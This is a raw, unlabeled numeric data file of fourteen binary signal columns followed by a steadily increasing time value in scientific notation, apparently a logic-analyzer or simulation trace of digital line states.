1,1,1,1,1,1,0,0,0,1,0,0,1,0,3.5750228e-02 1,1,1,1,1,1,0,0,0,1,0,0,0,0,3.5750252e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,3.5750260e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,3.5750312e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,3.5750340e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,3.5750388e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,3.5750412e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,3.5750464e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,3.5750492e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,3.5750540e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,3.5750564e-02 1,1,1,1,1,1,0,0,0,1,0,0,0,0,3.5750572e-02 1,1,1,1,1,1,0,0,0,1,0,0,1,0,3.5750588e-02 1,1,1,1,1,1,0,0,0,1,0,0,0,0,3.5750612e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,3.5750620e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,3.5750640e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,3.5750664e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,3.5750692e-02 1,1,1,1,1,0,0,0,0,1,0,0,0,0,3.5750716e-02 1,1,1,1,1,1,0,0,0,1,0,0,0,0,3.5750720e-02 1,1,1,1,1,1,0,0,0,1,0,0,1,0,3.5750764e-02 1,1,1,1,1,1,0,0,0,1,0,0,0,0,3.5750788e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,3.5750796e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,3.5750812e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,3.5750840e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,3.5750864e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,3.5750892e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,3.5750916e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,3.5750940e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,3.5750964e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,3.5750988e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,3.5751012e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,3.5751040e-02 1,1,1,1,1,1,0,0,0,1,0,0,0,0,3.5751044e-02 1,1,1,1,1,1,0,0,0,1,0,0,1,0,3.5751092e-02 1,1,1,1,1,1,0,0,0,1,0,0,0,0,3.5751116e-02 1,1,1,1,1,1,0,0,0,1,0,0,1,0,3.5751140e-02 1,1,1,1,1,1,0,0,0,1,0,0,0,0,3.5751164e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,3.5751172e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,3.5751212e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,3.5751240e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,3.5751292e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,3.5751320e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,3.5751372e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,3.5751396e-02 1,1,1,1,1,1,0,0,0,1,0,0,0,0,3.5751404e-02 1,1,1,1,1,1,0,0,0,1,0,0,1,0,3.5751420e-02 1,1,1,1,1,1,0,0,0,1,0,0,0,0,3.5751444e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,3.5751452e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,3.5751476e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,3.5751496e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,3.5751524e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,3.5751548e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,3.5751572e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,3.5751596e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,3.5751620e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,3.5751644e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,3.5751676e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,3.5751696e-02 1,1,1,1,1,1,0,0,0,1,0,0,0,0,3.5751704e-02 1,1,1,1,1,1,0,0,0,1,0,0,1,0,3.5751748e-02 1,1,1,1,1,1,0,0,0,1,0,0,0,0,3.5751772e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,3.5751780e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,3.5751796e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,3.5751820e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,3.5751844e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,3.5751876e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,3.5751896e-02 1,1,1,1,1,1,0,0,0,1,0,0,0,0,3.5751924e-02 1,1,1,1,1,1,0,0,0,1,0,0,1,0,3.5751976e-02 1,1,1,1,1,1,0,0,0,1,0,0,0,0,3.5751996e-02 1,1,1,1,1,1,0,0,0,0,0,0,0,0,3.5752004e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,3.5752008e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,3.5752020e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,3.5752048e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,3.5752076e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,3.5752100e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,3.5752124e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,3.5752148e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,3.5752180e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,3.5752204e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,3.5752228e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,3.5752252e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,3.5752280e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,3.5752304e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,3.5752332e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,3.5752356e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,3.5752380e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,3.5752404e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,3.5752428e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,3.5752452e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,3.5752480e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,3.5752504e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,3.5752532e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,3.5752556e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,3.5752580e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,3.5752604e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,3.5752628e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,3.5752652e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,3.5752680e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,3.5752704e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,3.5752732e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,3.5752756e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,3.5752780e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,3.5752804e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,3.5752828e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,3.5752852e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,3.5752880e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,3.5752904e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,3.5752932e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,3.5752956e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,3.5752980e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,3.5753004e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,3.5753028e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,3.5753052e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,3.5753080e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,3.5753104e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,3.5753132e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,3.5753156e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,3.5753180e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,3.5753204e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,3.5753228e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,3.5753252e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,3.5753280e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,3.5753304e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,3.5753332e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,3.5753356e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,3.5753380e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,3.5753404e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,3.5753428e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,3.5753452e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,3.5753480e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,3.5753504e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,3.5753532e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,3.5753556e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,3.5753580e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,3.5753604e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,3.5753628e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,3.5753652e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,3.5753680e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,3.5753704e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,3.5753732e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,3.5753756e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,3.5753780e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,3.5753804e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,3.5753828e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,3.5753852e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,3.5753880e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,3.5753904e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,3.5753932e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,3.5753956e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,3.5753980e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,3.5754004e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,3.5754028e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,3.5754052e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,3.5754080e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,3.5754104e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,3.5754124e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,3.5754156e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,3.5754180e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,3.5754204e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,3.5754228e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,3.5754252e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,3.5754280e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,3.5754304e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,3.5754328e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,3.5754356e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,3.5754380e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,3.5754404e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,3.5754428e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,3.5754452e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,3.5754480e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,3.5754504e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,3.5754524e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,3.5754556e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,3.5754580e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,3.5754604e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,3.5754628e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,3.5754652e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,3.5754680e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,3.5754704e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,3.5754732e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,3.5754756e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,3.5754780e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,3.5754804e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,3.5754828e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,3.5754852e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,3.5754880e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,3.5754904e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,3.5754932e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,3.5754956e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,3.5754980e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,3.5755004e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,3.5755028e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,3.5755052e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,3.5755080e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,3.5755104e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,3.5755132e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,3.5755156e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,3.5755180e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,3.5755204e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,3.5755228e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,3.5755252e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,3.5755280e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,3.5755304e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,3.5755332e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,3.5755356e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,3.5755380e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,3.5755404e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,3.5755428e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,3.5755452e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,3.5755480e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,3.5755504e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,1,3.5879180e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,1,3.5879360e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,1,3.5879364e-02 0,0,0,0,0,0,0,0,0,0,0,1,0,1,3.5879396e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,1,3.5879428e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,1,3.5879720e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,1,3.5879748e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,1,3.5879772e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,1,3.5879792e-02 0,0,0,0,0,0,1,0,0,0,0,0,0,1,3.5879796e-02 0,0,0,0,0,0,1,0,0,0,1,0,0,1,3.5879800e-02 0,0,0,0,0,0,1,0,0,0,1,0,1,1,3.5879816e-02 0,0,0,0,0,0,1,0,0,0,1,0,0,1,3.5879844e-02 0,0,0,0,0,0,0,0,0,0,1,0,0,1,3.5879848e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,1,3.5879852e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,1,3.5879868e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,1,3.5879892e-02 0,0,0,0,0,0,1,0,0,0,1,0,0,1,3.5879896e-02 0,0,0,0,0,0,1,0,0,0,1,0,1,1,3.5879916e-02 0,0,0,0,0,0,1,0,0,0,1,0,0,1,3.5879940e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,1,3.5879948e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,1,3.5879964e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,1,3.5879992e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,3.5880016e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,3.5880044e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,3.5880068e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,3.5880092e-02 0,0,0,0,0,0,1,0,0,0,1,0,0,0,3.5880096e-02 0,0,0,0,0,0,1,0,0,0,1,0,1,0,3.5880116e-02 0,0,0,0,0,0,1,0,0,0,1,0,0,0,3.5880140e-02 0,0,0,0,0,0,1,0,0,0,1,0,1,0,3.5880164e-02 0,0,0,0,0,0,1,0,0,0,1,0,0,0,3.5880192e-02 0,0,0,0,0,0,1,0,0,0,1,0,1,0,3.5880216e-02 0,0,0,0,0,0,1,0,0,0,1,0,0,0,3.5880244e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,3.5880248e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,3.5880268e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,3.5880292e-02 0,0,0,0,0,0,1,0,0,0,1,0,0,0,3.5880296e-02 0,0,0,0,0,0,1,0,0,0,1,0,1,0,3.5880316e-02 0,0,0,0,0,0,1,0,0,0,1,0,0,0,3.5880340e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,3.5880348e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,3.5880364e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,3.5880392e-02 0,0,0,0,0,0,1,0,0,0,1,0,0,0,3.5880396e-02 0,0,0,0,0,0,1,0,0,0,1,0,1,0,3.5880416e-02 0,0,0,0,0,0,1,0,0,0,1,0,0,0,3.5880444e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,3.5880448e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,3.5880468e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,3.5880492e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,3.5880516e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,3.5880540e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,3.5880564e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,3.5880592e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,3.5880616e-02 0,0,0,0,0,0,1,0,0,0,1,0,0,0,3.5880644e-02 0,0,0,0,0,0,1,0,0,0,1,0,1,0,3.5880668e-02 0,0,0,0,0,0,1,0,0,0,1,0,0,0,3.5880692e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,3.5880700e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,3.5880716e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,3.5880740e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,3.5880764e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,3.5880792e-02 0,0,0,0,0,0,1,0,0,0,1,0,0,0,3.5880796e-02 0,0,0,0,0,0,1,0,0,0,1,0,1,0,3.5880816e-02 0,0,0,0,0,0,1,0,0,0,1,0,0,0,3.5880844e-02 0,0,0,0,0,0,1,0,0,0,1,0,1,0,3.5880868e-02 0,0,0,0,0,0,1,0,0,0,1,0,0,0,3.5880892e-02 0,0,0,0,0,0,1,0,0,0,1,0,1,0,3.5880916e-02 0,0,0,0,0,0,1,0,0,0,1,0,0,0,3.5880940e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,3.5880948e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,3.5880964e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,3.5880992e-02 0,0,0,0,0,0,1,0,0,0,1,0,0,0,3.5880996e-02 0,0,0,0,0,0,1,0,0,0,1,0,1,0,3.5881016e-02 0,0,0,0,0,0,1,0,0,0,1,0,0,0,3.5881044e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,3.5881048e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,3.5881068e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,3.5881092e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,3.5881116e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,3.5881140e-02 0,0,0,0,0,0,1,0,0,0,1,0,0,0,3.5881148e-02 0,0,0,0,0,0,1,0,0,0,1,0,1,0,3.5881164e-02 0,0,0,0,0,0,1,0,0,0,1,0,0,0,3.5881192e-02 0,0,0,0,0,0,1,0,0,0,1,0,1,0,3.5881216e-02 0,0,0,0,0,0,1,0,0,0,1,0,0,0,3.5881244e-02 0,0,0,0,0,0,1,0,0,0,1,0,1,0,3.5881268e-02 0,0,0,0,0,0,1,0,0,0,1,0,0,0,3.5881292e-02 0,0,0,0,0,0,1,0,0,0,1,0,1,0,3.5881316e-02 0,0,0,0,0,0,1,0,0,0,1,0,0,0,3.5881340e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,3.5881348e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,3.5881364e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,3.5881392e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,3.5881416e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,3.5881444e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,3.5881468e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,3.5881492e-02 0,0,0,0,0,0,1,0,0,0,1,0,0,0,3.5881496e-02 0,0,0,0,0,0,1,0,0,0,1,0,1,0,3.5881516e-02 0,0,0,0,0,0,1,0,0,0,1,0,0,0,3.5881540e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,3.5881548e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,3.5881564e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,3.5881592e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,3.5881616e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,3.5881644e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,3.5881664e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,3.5881692e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,3.5881716e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,3.5881740e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,3.5881764e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,3.5881788e-02 0,0,0,0,0,0,1,0,0,0,1,0,0,0,3.5881796e-02 0,0,0,0,0,0,1,0,0,0,1,0,1,0,3.5881816e-02 0,0,0,0,0,0,1,0,0,0,1,0,0,0,3.5881840e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,3.5881848e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,3.5881864e-02 0,0,0,0,0,0,1,0,0,0,1,0,0,0,3.5881892e-02 0,0,0,0,0,0,1,0,0,0,1,0,1,0,3.5881916e-02 0,0,0,0,0,0,1,0,0,0,1,0,0,0,3.5881940e-02 0,0,0,0,0,0,1,0,0,0,1,0,1,0,3.5881964e-02 0,0,0,0,0,0,1,0,0,0,1,0,0,0,3.5881988e-02 0,0,0,0,0,0,1,0,0,0,1,0,1,0,3.5882012e-02 0,0,0,0,0,0,1,0,0,0,1,0,0,0,3.5882040e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,3.5882044e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,3.5882064e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,3.5882092e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,3.5882116e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,3.5882140e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,3.5882164e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,3.5882188e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,3.5882212e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,3.5882240e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,3.5882264e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,3.5882292e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,3.5882316e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,3.5882340e-02 0,0,0,0,0,0,1,0,0,0,1,0,0,0,3.5882344e-02 0,0,0,0,0,0,1,0,0,0,1,0,1,0,3.5882364e-02 0,0,0,0,0,0,1,0,0,0,1,0,0,0,3.5882388e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,3.5882396e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,3.5882412e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,3.5882440e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,3.5882464e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,3.5882492e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,3.5882516e-02 0,0,0,0,0,0,1,0,0,0,0,0,0,0,3.5882540e-02 0,0,0,0,0,0,1,0,0,0,1,0,0,0,3.5882544e-02 0,0,0,0,0,0,1,0,0,0,1,0,1,0,3.5882564e-02 0,0,0,0,0,0,1,0,0,0,1,0,0,0,3.5882588e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,3.5882596e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,3.5882612e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,3.5882640e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,3.5882664e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,3.5882692e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,3.5882716e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,3.5882740e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,3.5882764e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,3.5882788e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,3.5882812e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,3.5882840e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,3.5882864e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,3.5882892e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,3.5882916e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,3.5882940e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,3.5882964e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,3.5882988e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,3.5883012e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,3.5883040e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,3.5883064e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,3.5883092e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,3.5883116e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,3.5883140e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,3.5883164e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,3.5883188e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,3.5883212e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,3.5883240e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,3.5883264e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,3.5883292e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,3.5883316e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,3.5883340e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,3.5883364e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,3.5883388e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,3.5883412e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,3.5883440e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,3.5883464e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,3.5883492e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,3.5883516e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,3.5883540e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,3.5883564e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,3.5883588e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,3.5883612e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,3.5883640e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,3.5883664e-02 